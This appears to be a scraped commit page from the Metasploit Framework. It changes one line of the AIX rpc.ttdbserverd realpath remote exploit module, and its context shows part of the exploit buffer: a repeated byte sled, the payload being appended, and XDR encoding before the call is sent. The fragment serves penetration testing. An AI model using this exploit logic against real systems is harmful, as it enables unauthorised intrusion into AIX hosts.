Fix the aix/rpc_ttdbserverd_realpath.rb module to use @aixpayload instead of payload.encoded
git-svn-id: file:///home/svn/framework3/trunk@9350 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d31dd35f62
commit
db272ef7b5
|
@ -268,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
buf << "\x7f\xff\xfb\x78" * 1920
|
||||
buf << payload.encoded
|
||||
buf << @aixpayload
|
||||
buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
|
||||
|
||||
print_status('Sending procedure 15 call message...')
|
||||
|
|
Loading…
Reference in New Issue